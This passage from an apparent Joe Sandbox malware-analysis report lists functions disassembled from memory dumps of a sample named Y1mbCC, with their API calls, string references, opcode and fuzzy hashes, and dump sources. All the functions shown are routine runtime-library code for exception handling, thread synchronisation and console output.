Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700

Function 00007FFE148C5448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE148C54B8
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE148C5503

Strings

RCC, xrefs: 00007FFE148C54D4
MOC, xrefs: 00007FFE148C54CC

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction ID: cd53eda25688f5b21b0e0baa6bc8ea68a2702e6a668ee62a29b7d5b43b20fc43
Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction Fuzzy Hash: 9491B273A08B918AEB10DB66D4806ED7BA0FB46798F50413AFB4D17B65DF38D199CB00

Function 00007FFE148C3A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE148C3A63
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE148C3AFA
RtlUnwindEx.KERNEL32 ref: 00007FFE148C3B54

Strings

csm, xrefs: 00007FFE148C3AE1

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction ID: e47a90d19a403a11fbf3fa05a8c03fc4c128c14a3efaf91cecf17225d556ef68
Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction Fuzzy Hash: B851B231B19E428ADB149B16D484EBC7391EB45BA8F908170FA4E437A8DF7DE95AC700

Function 00007FFE148C51D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE148C5237
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE148C5283

Strings

RCC, xrefs: 00007FFE148C5253
MOC, xrefs: 00007FFE148C524B

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction ID: b748c8943eb3eb9a40b19b2dbf9a44f19c71fc1ec83dbe9852992f2f4cf9a557
Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction Fuzzy Hash: 04619272908BD581DB609B16E4807EAB7A0FB867A4F444275FB9C07B65CF7CD198CB10

Function 00007FFE148C59C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE148C59F0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE148C5AD8

Strings

csm, xrefs: 00007FFE148C5B2A
csm, xrefs: 00007FFE148C5A12

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction ID: 28c709d429ee1c461dc61754c853aaa9030c3283477ada104efa06e980d320d2
Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction Fuzzy Hash: BE51A332908B52CADF648F1394C4BA87B90EB56BA4F944175EA4D437A5CF3CE495C710

Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

GetModuleHandleA.KERNEL32 ref: 000000014000EE2D
GetProcAddress.KERNEL32 ref: 000000014000EE42

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 000000014000EE38
kernel32.dll, xrefs: 000000014000EE26

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: AddressHandleLoadModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3055805555-3733552308
Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700

Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 000000014000271C
GetCurrentProcess.KERNEL32 ref: 0000000140002721
SetProcessWorkingSetSize.KERNEL32 ref: 0000000140002731

Strings

Shrinking process size, xrefs: 000000014000270E

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Process$CurrentSizeWorking
String ID: Shrinking process size
API String ID: 2122760700-652428428
Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310

Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400030E7
LeaveCriticalSection.KERNEL32 ref: 000000014000316B
EnterCriticalSection.KERNEL32 ref: 0000000140003195
EnterCriticalSection.KERNEL32 ref: 00000001400031C6
LeaveCriticalSection.KERNEL32 ref: 00000001400031DD

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744

Function 00007FFE148CE3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFE148CE473
WriteFile.KERNEL32 ref: 00007FFE148CE73B
WriteFile.KERNEL32 ref: 00007FFE148CE781
GetLastError.KERNEL32 ref: 00007FFE148CE837

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction ID: 4bc3a566b9070bf1ed17a27b2811801b31daee2a28a9e8a5f7bcd3470dcba4eb
Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction Fuzzy Hash: 84D1D232B19A8189E710CF66D4806FC37A1FB467B8B444276EE5D97BE9DE38D40AC340

Function 00007FFE148CED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00007FFE148CED07), ref: 00007FFE148CEE38
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00007FFE148CED07), ref: 00007FFE148CEEC3

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction ID: 09cf747fcb380e380eba4f7a06e57a0d7576b9b99658be0cb4c4e710cccdf453
Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction Fuzzy Hash: 35919232E18E5185F7609F6694C0AFD2BA1EB06BB8F9441B5EE4E567E4CF38D449C700

Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304

Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014000441F
ResetEvent.KERNEL32 ref: 00000001400044CB
SetEvent.KERNEL32 ref: 00000001400044D5
LeaveCriticalSection.KERNEL32 ref: 00000001400044DF

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344

Function 00007FFE148C2218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFE148C2244
GetCurrentThreadId.KERNEL32 ref: 00007FFE148C2252
GetCurrentProcessId.KERNEL32 ref: 00007FFE148C225E
QueryPerformanceCounter.KERNEL32 ref: 00007FFE148C226E

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction ID: e52c108a1e213550daea8a0e8835d8827409a98e6bc470fea6e9c0b219171b57
Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction Fuzzy Hash: 5D112E22B15F018AEB00EF61E8952B833A4F75A768F440E31EA6D477A4DF7CD559C340

Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014001367B
CreateEventW.KERNEL32 ref: 000000014001368D
CreateEventW.KERNEL32 ref: 00000001400136A7
CreateEventW.KERNEL32 ref: 00000001400136C0

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CreateEvent$CriticalInitializeSection
String ID:
API String ID: 926662266-0
Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700

Function 00007FFE148C5C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE148C5C2A

Strings

csm, xrefs: 00007FFE148C5DBE
csm, xrefs: 00007FFE148C5C4F

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction ID: 57de6b6b679ab7968e5ea79d189b242e013613ae0d22020cba442d5d0cb88180
Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction Fuzzy Hash: 8C71A332908A9186DB608F169480BBD7BA0FB06BA4F948175FE8C47BA5CF2CE455C750

Function 00007FFE148C6298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE148C6342
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE148C636B

Strings

csm, xrefs: 00007FFE148C646B

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction ID: 7dd4bc2c55857e8f1ae674a13a1f7035e8e113f78400c4c53f8c3315e87bc23a
Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction Fuzzy Hash: 75518332618B4196D620EF16E0806AD77A4FB8ABA4F500174FB8D57B65CF3CF496CB41

Function 00007FFE148CEA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFE148CEBA3
GetLastError.KERNEL32 ref: 00007FFE148CEBC5

Strings

U, xrefs: 00007FFE148CEB4F

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction ID: 78588ba59cb6de672ba6c308f5e979fcec4ca329ead4c6c0ca451a7201daf2e3
Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction Fuzzy Hash: 7341A232A19F8182DB20DF26E4847BA67A1FB997A4F844131EE4E877A4DF3CD445CB40

Function 00007FFE148C9940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FFE148C99B9
GetFileType.KERNEL32 ref: 00007FFE148C99CF

Strings

0e], xrefs: 00007FFE148C9A07

Memory Dump Source

Source File: 00000007.00000002.2897869850.00007FFE148C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE148C0000, based on PE: true

Associated: 00000007.00000002.2897857394.00007FFE148C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897884851.00007FFE148D2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897898758.00007FFE148DD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2897911098.00007FFE148DF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe148c0000_Y1mbCC.jbxd

Similarity

API ID: FileHandleType
String ID: 0e]
API String ID: 3000768030-3598356009
Opcode ID: ad76da5c0a2ad7b24dd820ce22a2f6dea1c96ad3649e3b10ed6011db975978b7
Instruction ID: c6c35b73a7fa0127e77215df5c167d99624d676d1bdf18bd8ab2630d9509c8ef
Opcode Fuzzy Hash: ad76da5c0a2ad7b24dd820ce22a2f6dea1c96ad3649e3b10ed6011db975978b7
Instruction Fuzzy Hash: 9A318931A18F4591E7618B1695C05B86650FB46BB4FA813B5F76E173F0CF38E499D340

Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000014001256D
RaiseException.KERNEL32 ref: 000000014001258A

Strings

csm, xrefs: 00000001400125BE

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41

Function 00007FFE148D0910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE148C3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE148C3A63

__GSHandlerCheckCommon.LIBCMT ref: 00007FFE148D0993

Strings

csm, xrefs: 00007FFE148D092B
f, xrefs: 00007FFE148D0925

Memory Dump Source

